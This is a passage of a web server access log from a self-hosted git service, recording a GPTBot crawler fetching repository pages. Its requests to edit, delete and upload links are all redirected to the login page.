+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:12:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11350] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10541] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 10179] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 10168] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:12:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:12:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include" +[17/Feb/2026:18:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:18:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:18:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22733] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:18:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22735] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:18:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fwarn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 22149] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:18:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:12:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/.vscode/c_cpp_properties.json" 